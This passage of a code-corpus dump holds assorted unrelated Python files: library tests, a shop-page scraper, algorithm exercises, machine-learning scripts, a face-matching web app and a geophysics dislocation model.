Using pdftotext from same package as pdfinfo.\n cmd = [\"pdftotext\", file_name, '-']\n proc = subprocess.Popen(cmd, stdout=subprocess.PIPE)\n stdout, _ = proc.communicate()\n output = stdout.decode().splitlines()\n return output\n\n\ndef test_write_html_to_tempfile():\n block = Mock()\n block._id = 'test_id'\n content = 'dummy'\n\n file_name = HTMLConverter.write_html_to_tempfile(block, text_type(content))\n assert os.path.split(file_name)[-1].startswith('test_id')\n assert file_name.endswith('html')\n with open(file_name, 'r') as f:\n assert f.read() == content\n\n # Cleanup\n os.remove(file_name)\n\n\n@pytest.mark.parametrize('converter_name', ['chrome_headless', 'wkhtmltopdf'])\ndef test_pdf_converter_output(converter_name):\n with patch('pybloqs.htmlconv.user_config', {'pdf_converter': converter_name}):\n # Test if header and footer are included twice (once per page)\n page_one = p.Block('Lorem', styles={\"page-break-after\": \"always\"})\n page_two = p.Block('ipsum')\n body = p.VStack([page_one, page_two])\n header_text = uuid.uuid4().hex\n header = p.Block(header_text)\n footer_text = uuid.uuid4().hex\n footer = p.Block(footer_text, styles={'background': 'red'})\n\n pdf_file = body.save(fmt='pdf',\n header_block=header, header_spacing=50,\n footer_block=footer, footer_spacing=50)\n output = run_pdftotext(pdf_file)\n assert output.count(header_text) == 2\n assert output.count(footer_text) == 2\n\n output = run_pdfinfo(pdf_file)\n assert output['Pages'] == '2'\n page_width, _, page_height, _, label = output['Page size'].split(' ')\n # Rounding errors between different converters. Need to check approximate values.\n assert np.isclose(float(page_height), A4_LONG_PTS, atol=0.1)\n assert np.isclose(float(page_width), A4_SHORT_PTS, atol=0.1)\n assert label == '(A4)'\n\n # Variation: Check that landscape format works\n pdf_file = body.save(fmt='pdf', orientation=LANDSCAPE)\n output = run_pdfinfo(pdf_file)\n page_width, _, page_height, _, label = output['Page size'].split(' ')\n assert np.isclose(float(page_height), A4_SHORT_PTS, atol=0.1)\n assert np.isclose(float(page_width), A4_LONG_PTS, atol=0.1)\n assert label == '(A4)'\n\n # Variation: Check that page size works\n pdf_file = body.save(fmt='pdf', pdf_page_size='Legal')\n output = run_pdfinfo(pdf_file)\n # No rounding errors between converters for 'Legal' format\n assert output['Page size'] == '612 x 1008 pts'\n\n\ndef test_image_output():\n block = p.Block('Lorem ipsum')\n png_file = block.save(fmt='png')\n with open(png_file, 'rb') as f:\n raw_data = f.read()\n assert raw_data[1:4] == b'PNG'\n\n jpg_file = block.save(fmt='jpg')\n with open(jpg_file, 'rb') as f:\n raw_data = f.read()\n assert raw_data[6:10] == b'JFIF'\n\n svg_file = block.save(fmt='svg')\n with open(svg_file, 'rb') as f:\n raw_data = f.read()\n assert b'= 4.5 and int(rate_cnt) >= 100:\n print(f\"제품명 : {name}\")\n print(f\"가격 : {price}\")\n print(f\"평점 : {rate}점 ({rate_cnt}개)\")\n print(\"링크 : {}\".format(\"http://www.coupang.com\", link))\n \n print(f\"-\"*100)\n","repo_name":"yacmov/Self_Study_Python","sub_path":"04_Web_Crawling/01_Web_Basic/11_bs4_coupang.pages.py","file_name":"11_bs4_coupang.pages.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"29222624459","text":"valx = input(\"Type value of x : \")\nvaly = input(\"Type value of y : \")\n\n\ndef karatsuba(x,y):\n\tif(len(x) == 1 or len(y) == 1):\n\t\treturn int(x) * int(y)\n\tmidx = int(len(x) / 2)\n\tmidy = 
int(len(y) / 2)\n\ta = x[:midx]\n\tb = x[midx:]\n\tc = y[:midy]\n\td = y[midy:]\n\tvalac = karatsuba(a,c)\n\tvalbd = karatsuba(b,d)\n\tdiff = str((int(a) + int(b)) * (int(c) + int(d)) - valac - valbd)\n\tval1 = str(valac).ljust(len(str(valac))+len(x), '0')\n\tval2 = diff.ljust(len(diff)+midx, '0')\n\ttotal = int(val1) + int(val2) + valbd\n\treturn total\n\n\nprint(karatsuba(valx,valy))","repo_name":"poooh/DSA","sub_path":"karatsuba.py","file_name":"karatsuba.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"35458775974","text":"\nimport collections\n\nclass TrieNode:\n def __init__(self):\n self.isWord = False\n self.children = {}\n\nclass Trie:\n def __init__(self):\n self.root = TrieNode()\n\n def insert(self, word):\n node = self.root\n for ch in word:\n if ch not in node.children:\n node.children[ch] = TrieNode()\n node = node.children[ch]\n node.isWord = True\n\n def search(self, word):\n node = self.root\n for ch in word:\n if ch not in node.children:\n return False\n node = node.children[ch]\n return node.isWord\n\n\nclass MagicDictionaryTony:\n def __init__(self):\n self.trie = Trie()\n\n def buildDict(self, dictionary) -> None:\n for word in dictionary:\n self.trie.insert(word)\n\n def search(self, word: str) -> bool:\n self.modified = False\n return self.dfs(self.trie.root, 0, 1, word)\n\n def dfs(self, node, i, k, word):\n if i == len(word):\n return node.isWord and k == 0\n\n # can not modify anymore\n if k == 0:\n if word[i] in node.children:\n return self.dfs(node.children[word[i]], i + 1, k, word)\n else:\n # another diff\n return False\n else:\n for ch in node.children:\n # need to modify, k -= 1\n if ch != word[i]:\n k -= 1\n if self.dfs(node.children[ch], i + 1, k, word):\n return True\n return False\n\n\n\nclass MagicDictionaryRika:\n def __init__(self):\n self.trie = Trie()\n\n def buildDict(self, dictionary) -> None:\n for word in dictionary:\n self.trie.insert(word)\n\n def search(self, searchWord: str) -> bool:\n node = self.trie.root\n return self.dfs(node, searchWord, 0, 1)\n\n def dfs(self, node, word, i, k):\n if k < 0:\n return False\n\n if i == len(word):\n return k == 0 and node.isWord\n\n ch = word[i]\n if ch in node.children:\n if self.dfs(node.children[ch], word, i + 1, k):\n return True\n\n for child in node.children:\n if ch != child and self.dfs(node.children[child], word, i + 1, k - 1):\n return True\n return False\n\n\nclass MagicDictionary2:\n def __init__(self):\n self.table = collections.defaultdict(set)\n\n def buildDict(self, dictionary) -> None:\n for word in dictionary:\n n = len(word)\n if n not in self.table:\n self.table[n] = set()\n self.table[n].add(word)\n\n def search(self, searchWord: str) -> bool:\n n = len(searchWord)\n if n not in self.table:\n return False\n\n for s in self.table[n]:\n count = 0\n for i in range(n):\n if searchWord[i] != s[i]:\n count += 1\n\n if count == 1:\n return True\n\n return False\n\n\n\n","repo_name":"Taoge123/OptimizedLeetcode","sub_path":"LeetcodeNew/python/LC_676.py","file_name":"LC_676.py","file_ext":"py","file_size_in_byte":3035,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"19"} +{"seq_id":"38189768959","text":"import argparse\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport matplotlib.pyplot as plt\nfrom data import *\nfrom networks import *\n\nif __name__ == '__main__':\n parser = 
argparse.ArgumentParser(\n description='Estimate uncertainty for data samples.')\n parser.add_argument('model_path', type=str,\n help='Path to uncertainty estimation model.',\n metavar='path/to/model.pth')\n parser.add_argument('subset', type=str,\n help='Subset for which to estimate uncertainty.',\n choices=['all', 'val'],\n metavar='')\n parser.add_argument('save_target', type=str,\n help='File to save estimations.',\n metavar='path/to/estimations.npz')\n parser.add_argument('--mc_dropout_samples', type=int,\n help='Number of MC samples for dropout.',\n metavar='',\n default=50)\n parser.add_argument('--visualize_estimations', action='store_true',\n help='Plot samples and their uncertainty estimations.',\n default=False)\n args = parser.parse_args()\n\n # Load data\n if args.subset == 'val':\n (_, data_loader, _, data_clean_loader, _) = load_cifar10(\n batch_size=1, train_shuffle=False)\n if args.subset == 'all':\n (data_loader, _, data_clean_loader, _, _) = load_cifar10(\n batch_size=1, split_train=False, train_shuffle=False)\n\n # CIFAR-10 classes\n classes = ('plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog',\n 'horse', 'ship', 'truck')\n\n # Load model state\n model = AleatoricCNN(in_channels=3, n_classes=10)\n criterion = nn.NLLLoss()\n checkpoint = torch.load(args.model_path, map_location='cpu')\n model.load_state_dict(checkpoint['model_state_dict'])\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n model = model.to(device)\n model.eval()\n\n predictive_uncertainty_samples = []\n aleatoric_uncertainty_samples = []\n epistemic_uncertainty_samples = []\n loss_samples = []\n pred_labels = []\n clean_labels = []\n noisy_labels = []\n\n # MC dropout Sampling - enable dropout during eval \n model.apply(lambda m: m.train() if type(m) == nn.Dropout else None)\n images, _ = next(iter(data_loader))\n output_size = model(images.to(device)).size()\n\n print('[*] Predicting uncertainty for samples...')\n for i, (images, labels) in enumerate(data_loader):\n if (i + 1) % 100 == 0:\n print('[{}/{}]'.format(i + 1, len(data_loader)))\n images = images.to(device)\n labels = labels.to(device)\n\n mc_probs = torch.zeros(output_size, device=device)\n aleatoric = 0\n # MC samples of network outputs\n with torch.no_grad():\n for t in range(args.mc_dropout_samples):\n pred_log_probs = model(images)\n mc_probs = mc_probs + torch.exp(pred_log_probs)\n\n # Accumulate the sample entropies to estimate aleatoric uncertainty\n sample_entropy = torch.distributions.Categorical(\n probs=torch.exp(pred_log_probs)).entropy().item()\n aleatoric = aleatoric + sample_entropy\n\n # Compute uncertainties and losses\n mc_probs = mc_probs / args.mc_dropout_samples\n aleatoric = aleatoric / args.mc_dropout_samples\n predictive = torch.distributions.Categorical(\n probs=mc_probs).entropy().item()\n epistemic = predictive - aleatoric\n model_loss = criterion(mc_probs, labels)\n\n predictive_uncertainty_samples.append(predictive)\n aleatoric_uncertainty_samples.append(aleatoric)\n epistemic_uncertainty_samples.append(epistemic)\n loss_samples.append(model_loss.item())\n pred_labels.append(np.argmax(mc_probs.cpu()))\n noisy_labels.append(labels.cpu().item())\n clean_labels.append(data_clean_loader.dataset[i][1])\n\n # Visualize input labels and predicted uncertainty\n if args.visualize_estimations:\n img_np = np.transpose(images.cpu().numpy()[0, :], (1, 2, 0))\n plt.imshow(img_np / 2 + 0.5)\n plt.title('Noisy {} Correct {}: Predicted: {}'.format(\n classes[labels.cpu().item()],\n 
classes[data_clean_loader.dataset[i][1]],\n classes[np.argmax(mc_probs.cpu())]))\n print('Predictive: {:.4f}'.format(predictive), \n 'Aleatoric: {:.4f}'.format(aleatoric),\n 'Epistemic: {:.4f}'.format(epistemic))\n plt.show()\n\n# Save estimation results to target fle\npredictive_uncertainty_samples_array = np.array(predictive_uncertainty_samples)\naleatoric_uncertainty_samples_array = np.array(aleatoric_uncertainty_samples)\nepistemic_uncertainty_samples_array = np.array(epistemic_uncertainty_samples)\nloss_samples_array = np.array(loss_samples)\npred_labels_array = np.array(pred_labels)\nnoisy_labels_array = np.array(noisy_labels)\nclean_labels_array = np.array(clean_labels)\n\nnp.savez(args.save_target,\n predictive_uncertainty_samples_array,\n aleatoric_uncertainty_samples_array,\n epistemic_uncertainty_samples_array,\n loss_samples_array,\n pred_labels_array,\n noisy_labels_array,\n clean_labels_array)\n\n","repo_name":"AlexGraikos/uncertainty_label_noise","sub_path":"estimate_uncertainty.py","file_name":"estimate_uncertainty.py","file_ext":"py","file_size_in_byte":5575,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"11137948143","text":"import json\nfrom pathlib import Path\nimport typing as tp\n\nimport cv2\n\nfrom src.data_steam import DataStream\n\n\ndef main():\n with open(\"to_label.json\") as f:\n video_to_ids: tp.Dict[str, tp.List[int]] = json.load(f)\n root_path = Path.cwd() / \"frames\"\n if not root_path.exists():\n root_path.mkdir()\n for video, ids in video_to_ids.items():\n istream = DataStream(\"data/\" + video)\n for idx in ids:\n sample = istream[idx]\n save_path = f\"frames/{video}_{idx}.jpg\"\n cv2.imwrite(save_path, cv2.cvtColor(sample[\"color_frame\"], cv2.COLOR_BGR2RGB))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"vbakhteev/agrocode_hack_harvester_3d","sub_path":"move_frames_by_id.py","file_name":"move_frames_by_id.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"17029849669","text":"import argparse\nimport os\n\nfrom pip._vendor import requests\nfrom selenium import webdriver\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\nimport time\nimport json\n\n\nclass WebScrapper:\n\n def __init__(self, parent_ip=\"127.0.0.1:8000\"):\n time.sleep(5)\n self.parent_ip = parent_ip\n self.web_driver = webdriver.Remote(\n command_executor='http://firefox:4444/wd/hub',\n desired_capabilities=DesiredCapabilities.FIREFOX)\n\n def retrieve_url(self):\n url_to_retrieve = requests.get(f\"{self.parent_ip}/scrapper/latest_url\")\n\n return url_to_retrieve\n\n def scrap_url(self):\n while self.retrieve_url():\n blob = self.retrieve_url()\n self.web_driver.get(f\"https://www.olx.pl/oferta/{blob}.html\")\n\n offer_titlebox = self.web_driver.find_element_by_xpath('//div[@class=\"offer-titlebox\"]')\n\n title = offer_titlebox.find_element_by_tag_name(\"h1\").text\n price = offer_titlebox.find_element_by_xpath('//strong[@class=pricelabel]').text\n quality = self.web_driver.find_element_by_xpath('//strong[@class=\"offer-details__value\"]').text\n\n offer_bottombar__items = self.web_driver.find_element_by_id(\"offerbottombar\")\n create_date = offer_bottombar__items.find_element_by_tag_name('em').find_element_by_tag_name('strong').text\n views = offer_bottombar__items.find_element_by_xpath(\n '//span[@class=\"offer-bottombar__counter\"]/strong').text\n\n post_data = {\"url\": 
blob, \"title\": title, \"price\": price, \"quality\": quality, \"created\": create_date,\n \"views\": views}\n\n requests.post(f\"{self.parent_ip}/scrapper/add_data\", json=json.dumps(post_data))\n\n\nif __name__ == \"__main__\":\n\n # web_scrapper = WebScrapper(parent_ip=os.environ['MASTER_IP'])\n web_scrapper = WebScrapper(parent_ip=\"127.0.0.1:8000\")\n\n web_scrapper.scrap_url()\n","repo_name":"lukBaszak/scrapper-slave","sub_path":"parsing_service.py","file_name":"parsing_service.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"1472447272","text":"'''\n31c2dbb2e67188e37974b61ba3de791f\n'''\n\nimport sys\nimport os\n\n\ndef file_walker(root_dir):\n file_list = []\n for root, dirs, files in os.walk(root_dir, topdown=True):\n for name in files:\n file_list.append(os.path.join(root, name))\n for name in dirs:\n os.path.join(root, name)\n return file_list\n# end \n\n\nif __name__ == '__main__':\n root_path = '/root/PycharmProjects'\n\n # step 1: get list of files\n FILES = file_walker(root_path)\n print('TOT_FILES: {}'.format(str(len(FILES))))\n\n\n","repo_name":"ClaudeCundiff/pythonsnippets","sub_path":"file_walker.py","file_name":"file_walker.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"22036700863","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom Models.ConvNeXt.Module.DropPath import DropPath\nfrom Models.ConvNeXt.Module.LayerNorm import LayerNorm\n\n\nclass ConvNeXtBlock(nn.Module):\n r\"\"\" ConvNeXt Block. There are two equivalent implementations:\n (1) DwConv -> LayerNorm (channels_first) -> 1x1 Conv -> GELU -> 1x1 Conv; all in (N, C, H, W)\n (2) DwConv -> Permute to (N, H, W, C); LayerNorm (channels_last) -> Linear -> GELU -> Linear; Permute back\n We use (2) as we find it slightly faster in PyTorch\n\n Args:\n dim (int): Number of input channels.\n drop_rate (float): Stochastic depth rate. Default: 0.0\n layer_scale_init_value (float): Init value for Layer Scale. Default: 1e-6.\n \"\"\"\n\n def __init__(self, dim, drop_rate=0., layer_scale_init_value=1e-6):\n super().__init__()\n self.dwconv = nn.Conv2d(dim, dim, kernel_size=7, padding=3, groups=dim) # depthwise conv\n self.norm = LayerNorm(dim, eps=1e-6, data_format=\"channels_last\")\n self.pwconv1 = nn.Linear(dim, 4 * dim) # pointwise/1x1 convs, implemented with linear layers\n self.act = nn.GELU()\n self.pwconv2 = nn.Linear(4 * dim, dim)\n self.gamma = nn.Parameter(layer_scale_init_value * torch.ones((dim,)),\n requires_grad=True) if layer_scale_init_value > 0 else None\n self.drop_path = DropPath(drop_rate) if drop_rate > 0. 
else nn.Identity()\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n shortcut = x\n x = self.dwconv(x)\n x = x.permute(0, 2, 3, 1) # [N, C, H, W] -> [N, H, W, C]\n x = self.norm(x)\n x = self.pwconv1(x)\n x = self.act(x)\n x = self.pwconv2(x)\n if self.gamma is not None:\n x = self.gamma * x\n x = x.permute(0, 3, 1, 2) # [N, H, W, C] -> [N, C, H, W]\n\n x = shortcut + self.drop_path(x)\n return x\n","repo_name":"Karenina-na/Deep-Learning-Framework","sub_path":"Models/ConvNeXt/Module/ConvNeXtBlock.py","file_name":"ConvNeXtBlock.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"19"} +{"seq_id":"42952405890","text":"'''\nThis script launches a web application that captures faces from a webcam or an image and returns \nthe most similar face expressions from an art database.\n\nAuthor: Pepe Ballesteros\nLast update: 03.05.2022\n'''\nimport argparse\nimport sys\nimport gradio as gr\nimport mediapipe as mp\nimport cv2\nimport numpy as np\nfrom paramiko import Channel\nimport recommender_system as rs\nimport LPDatabaseGen\n\nparser = argparse.ArgumentParser(prog = 'FaceArt', description='FaceArt: A face expression recommender system', epilog = 'Enjoy!')\nparser.add_argument('-d', '--dataset', type = str, help='Indicate the name of the folder where the images are located (Required)', required=True)\nparser.add_argument('-s', '--save', help='Compute the landmark point database of the images and save it in the output folder. Required every time a new image dataset is used', action='store_true') \nparser.add_argument('-i', '--input', type = str, help='Indicate webcam or image. Whether to use the webcam or another image as an input (default is webcam)') \nargs = parser.parse_args()\n\ndef extract_face(image):\n '''\n Function that takes an input image snapshot form Gradio (numpy array) and returns the cropped image of the face\n '''\n mp_face_detection = mp.solutions.face_detection\n height, width, channel = image.shape\n with mp_face_detection.FaceDetection(\n model_selection=1, min_detection_confidence=0.4) as face_detection:\n results = face_detection.process(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))\n if results.detections:\n annotated_image = image.copy()\n for detection in results.detections:\n bBox = detection.location_data.relative_bounding_box\n x,y,w,h = int(bBox.xmin * width), int(bBox.ymin * height), int(bBox.width * width), int(bBox.height * height)\n aug_factor_x = int(0.2 * w)\n aug_factor_y = int(0.2 * h)\n cropped_image = annotated_image[y-aug_factor_y:y+h+aug_factor_y,x-aug_factor_x:x+w+aug_factor_x]\n return cropped_image\n\ndef extract_mesh(image):\n '''\n Function that takes an input image snapshot form Gradio (numpy array) and returns Landmark Points as a np array\n and the mesh of the cropped face with white background\n '''\n mp_face_mesh = mp.solutions.face_mesh\n mp_drawing = mp.solutions.drawing_utils\n mp_drawing_styles = mp.solutions.drawing_styles\n coordinates_list= []\n with mp_face_mesh.FaceMesh( static_image_mode=True, max_num_faces=1,refine_landmarks=True,min_detection_confidence=0.4) as face_mesh:\n w,h,c = image.shape\n results = face_mesh.process(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))\n white_background = np.zeros([w,h,c],dtype=np.uint8)\n white_background.fill(255)\n if results.multi_face_landmarks:\n for face_landmarks in results.multi_face_landmarks:\n for landmark in face_landmarks.landmark:\n coordinates_list.append(landmark.x)\n 
coordinates_list.append(landmark.y)\n # Drawing\n mp_drawing.draw_landmarks(\n image= white_background,\n landmark_list=face_landmarks,\n connections=mp_face_mesh.FACEMESH_TESSELATION,\n landmark_drawing_spec=None,\n connection_drawing_spec=mp_drawing_styles\n .get_default_face_mesh_tesselation_style()\n )\n return np.array(coordinates_list, dtype=np.float32), white_background\n\ndef get_recommended_images(files):\n imgs = []\n for file in files:\n img = cv2.imread(file)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n imgs.append(img)\n return imgs\n\ndef webapp(image):\n # Locate the face in the input image\n cropped = extract_face(image)\n # Calculate LP\n coordinates, white_background = extract_mesh(cropped)\n # Get recommendations\n recomended = rs.get_recommendations(coordinates, df, n=3)\n files = rs.get_image_names(df, recomended)\n recomendation_images = get_recommended_images(files)\n meshs = rs.get_mesh(files)\n meshs = rs.scale_images(meshs)\n recomendation_images = rs.scale_images(recomendation_images)\n im_vh = rs.concat_vh([[recomendation_images[0], recomendation_images[1], recomendation_images[2]],\n [meshs[0], meshs[1], meshs[2]]])\n return white_background, im_vh\n\n# Setup variables\nSAVE_OUTPUT_CSV = True if args.save else False\ndataset_path = args.dataset\nuser_input = args.input if args.input else 'webcam'\ndescription = \"\"\"\n Pepe Ballesteros Zapata - Digital Visual Studies\n \"\"\"\n\nif SAVE_OUTPUT_CSV:\n df = LPDatabaseGen.main(dataset_path)\nelse:\n df = rs.load_dataset('outputs/' + dataset_path + '.csv')\n\n# Web app Launching\ndef main():\n if user_input == 'webcam':\n input = gr.inputs.Image(shape=(640,480), source=\"webcam\", type=\"numpy\")\n else:\n input = gr.inputs.Image(type=\"numpy\")\n\n output1 = gr.outputs.Image(type=\"numpy\", label='Detected Mesh')\n output2 = gr.outputs.Image(type=\"numpy\", label='Top 3 Recommendations')\n app = gr.Interface(fn = webapp, inputs = input , outputs = [output1,output2], title='Face Art', theme = 'dark-peach',\n description=description, layout='aligned')\n try:\n app.launch(share=True)\n except KeyboardInterrupt:\n app.close()\n sys.exit()\n\nif __name__ == \"__main__\":\n main()","repo_name":"pepeballesterostel/FaceArt","sub_path":"FaceArt.py","file_name":"FaceArt.py","file_ext":"py","file_size_in_byte":5451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"37732178845","text":"import os\nimport sys\nimport platform\n\nfrom pytigon_lib.schtools.platform_info import platform_name\n\nif platform_name() != \"Emscripten\":\n import httpx\n\nimport tarfile\nimport zipfile\nimport io\nimport sys\nimport importlib\nfrom shutil import copyfile\nfrom pathlib import Path\nfrom pytigon_lib.schtools.process import run, py_run\nfrom pytigon_lib.schtools.main_paths import get_main_paths, get_python_version\n\n\nCOMPILER_INITIALIZED = False\n\n\ndef init_compiler():\n global COMPILER_INITIALIZED\n if not COMPILER_INITIALIZED:\n import ziglang\n\n os.environ[\"PY_ZIG\"] = os.path.join(ziglang.__path__[0], \"zig\")\n COMPILER_INITIALIZED = True\n\n\ndef compile(build_zig, output_file_name=None):\n cmd = [\n sys.executable,\n \"-m\",\n \"ziglang\",\n \"build\",\n \"--prefix-exe-dir\",\n \"../../\",\n \"--prefix-lib-dir\",\n \"../../\",\n ]\n base_path = os.path.dirname(build_zig)\n cwd = os.getcwd()\n os.chdir(base_path)\n (ret_code, output, err) = run(cmd)\n os.chdir(cwd)\n return (ret_code, output, err)\n\n\ndef make(data_path, files_path, prj_name=None):\n if 
platform_name() == \"Emscripten\":\n return None, None, None\n ret_output = []\n ret_errors = []\n ret = 0\n\n p = Path(files_path)\n\n fl = p.glob(\"**/build.zig\")\n for pos in fl:\n init_compiler()\n c_filename = p.joinpath(pos).as_posix()\n if os.path.exists(c_filename):\n (ret_code, output, err) = compile(c_filename)\n if ret_code:\n ret = ret_code\n if output:\n for pos2 in output:\n ret_output.append(pos2)\n if err:\n for pos2 in err:\n ret_errors.append(pos2)\n\n fl = p.glob(\"**/build.py\")\n for pos in fl:\n init_compiler()\n c_filename = p.joinpath(pos).as_posix()\n if os.path.exists(c_filename):\n if prj_name:\n cmd = [sys.executable, \"build.py\"]\n base_path = os.path.dirname(pos)\n cwd = os.getcwd()\n os.chdir(base_path)\n (ret_code, output, err) = run(cmd)\n os.chdir(cwd)\n\n if ret_code:\n ret = ret_code\n if output:\n for pos2 in output:\n ret_output.append(pos2)\n if err:\n for pos2 in err:\n ret_errors.append(pos2)\n\n fl = p.glob(\"**/setup.py\")\n for pos in fl:\n init_compiler()\n c_filename = p.joinpath(pos).as_posix()\n if os.path.exists(c_filename):\n if prj_name:\n cmd = [\n sys.executable,\n \"-m\",\n \"pytigon.ptig\",\n \"pip_%s\" % prj_name,\n \"install\",\n \"-e\",\n c_filename,\n ]\n base_path = os.path.dirname(pos)\n cwd = os.getcwd()\n os.chdir(base_path)\n (ret_code, output, err) = run(cmd)\n os.chdir(cwd)\n\n if ret_code:\n ret = ret_code\n if output:\n for pos2 in output:\n ret_output.append(pos2)\n if err:\n for pos2 in err:\n ret_errors.append(pos2)\n\n return ret, ret_output, ret_errors\n\n\ndef import_plugin(plugin_name, prj_name=None):\n cfg = get_main_paths()\n pytigon_cfg = [cfg[\"PYTIGON_PATH\"], \"appdata\", \"plugins\"]\n data_path = cfg[\"DATA_PATH\"]\n data_cfg = [data_path, \"plugins\"]\n prj_cfg = [cfg[\"PRJ_PATH\"], prj_name, \"applib\"]\n prj_cfg_alt = [cfg[\"PRJ_PATH_ALT\"], prj_name, \"applib\"]\n\n if prj_name:\n folders = [prj_cfg, prj_cfg_alt]\n else:\n folders = [pytigon_cfg, data_cfg]\n\n path = None\n for folder in folders:\n plugins_path = os.path.join(folder[0], *folder[1:])\n if prj_name:\n plugin_path = os.path.join(plugins_path, *plugin_name.split(\".\")[:-1])\n else:\n plugin_path = os.path.join(plugins_path, *plugin_name.split(\".\"))\n if os.path.exists(plugin_path):\n path = plugins_path\n path2 = plugin_path\n break\n\n if not path:\n return None\n\n try:\n m = importlib.import_module(plugin_name, package=None)\n return m\n except:\n make(data_path, path2, prj_name)\n try:\n m = importlib.import_module(plugin_name, package=None)\n return m\n except:\n pass\n return None\n","repo_name":"Splawik/pytigon-lib","sub_path":"pytigon_lib/schtools/cc.py","file_name":"cc.py","file_ext":"py","file_size_in_byte":4647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"7107341259","text":"class Solution:\n def subarraySum(self, nums: List[int], k: int) -> int:\n d = {0:1}\n sums,ans = 0,0\n for num in nums:\n sums+=num\n if sums-k in d:\n ans+=d[sums-k]\n d[sums]=d.get(sums,0)+1\n return ans","repo_name":"ruisunyc/leetcode_Solution","sub_path":"leetcode/0560.和为K的子数组/0560-和为K的子数组.py","file_name":"0560-和为K的子数组.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"22782476863","text":"#!/usr/bin/env python\nimport numpy as np\ntol = 1e-8\n\n\ndef rotation_3d(argZ,argY,argX):\n '''\n creates a matrix which rotates a coordinate in 3 dimensional space\n about the z axis by argz, 
the y axis by argy, and the x axis by\n argx, in that order\n '''\n R1 = np.array([[ np.cos(argZ), -np.sin(argZ), 0.0],\n [ np.sin(argZ), np.cos(argZ), 0.0],\n [ 0.0, 0.0, 1.0]])\n\n R2 = np.array([[ np.cos(argY), 0.0, np.sin(argY)],\n [ 0.0, 1.0, 0.0],\n [ -np.sin(argY), 0.0, np.cos(argY)]])\n\n R3 = np.array([[ 1.0, 0.0, 0.0],\n [ 0.0, np.cos(argX), -np.sin(argX)],\n [ 0.0, np.sin(argX), np.cos(argX)]])\n return R1.dot(R2.dot(R3))\n\n\ndef dislocation(points,\n slip,\n anchor,\n length,\n width,\n strike,\n dip,\n output_type='disp',\n lamb=3.2e10,\n mu=3.2e10):\n '''\n wrapper for okada92 which handles coordinate system rotations\n and translations needed to describe faults not anchored at the \n origin and oriented along the x axis.\n\n Parameters\n ----------\n \n points: N by 3 array of coordinates where the displacements or \n displacement derivatives will be computed. The problem domain\n is all points where the z is less than or equal to zero (which\n is consistent with Okada 92)\n\n slip: length 3 array describing left-lateral, thrust, and tensile \n motion on the fault\n\n anchor: The position of the top corner of the fault patch where \n the fault is continuing in the strike direction\n\n length: length of the fault in the strike direction\n\n width: width of the fault in the dip direction\n \n strike: angle of the fault patch in radians with respect to the y\n axis (clockwise is positive). This is consistent with the strike\n which would be used for a east-north-vertical coordinate system\n\n dip: The angle of the fault patch with respect to horizontal. This\n is in radians and should be between 0 and pi/2\n\n output_type: either 'disp', 'dudx', 'dudy', or 'dudz'\n\n Returns\n -------\n \n N by 3 array of displacement or its derivatives\n\n Note\n ----\n\n This function does not check for points which lie on the fault \n edge where the solution is not defined. It is possible that\n numpy will print very verbose Runtime Warnings and return a nan\n or and inf and it is also possible that a finite value will be\n returned although it will still be meaningless. \n\n\n Usage\n -----\n\n In [0]: import matplotlib.pyplot as plt\n In [1]: from okada import dislocation\n In [2]: x = np.linspace(-10,10,20)\n In [3]: y = np.linspace(-10,10,20)\n In [4]: xgrid,ygrid = np.meshgrid(x,y)\n In [5]: x = xgrid.flatten()\n In [6]: y = ygrid.flatten()\n In [7]: z = 0*y\n In [8]: points = np.array([x,y,z]).transpose()\n In [9]: anchor = [-1.0,2.0,0.0]\n In [10]: length = 5\n In [11]: width = 1\n In [12]: strike = np.pi/8.0\n In [13]: slip = [1.0,0.0,0.0]\n In [14]: out = dislocation(points,slip,anchor,length,width,strike,dip)\n In [15]: plt.plot(x,y,out[:,0],out[:,1])\n In [16]: plt.show()\n\n '''\n # compute fault geometry parameters\n p = np.array(points,copy=True)\n anchor = np.asarray(anchor)\n slip = np.asarray(slip)\n\n # compute depth to fault bottom\n c = width*np.sin(dip) - anchor[2]\n \n # translate points so that the origin coincides with the top fault \n # corner in the coordinate system used by okada92\n p[:,[0,1]] -= anchor[[0,1]]\n\n # angle between current reference frame and reference frame used by\n # okada92 (i.e. 
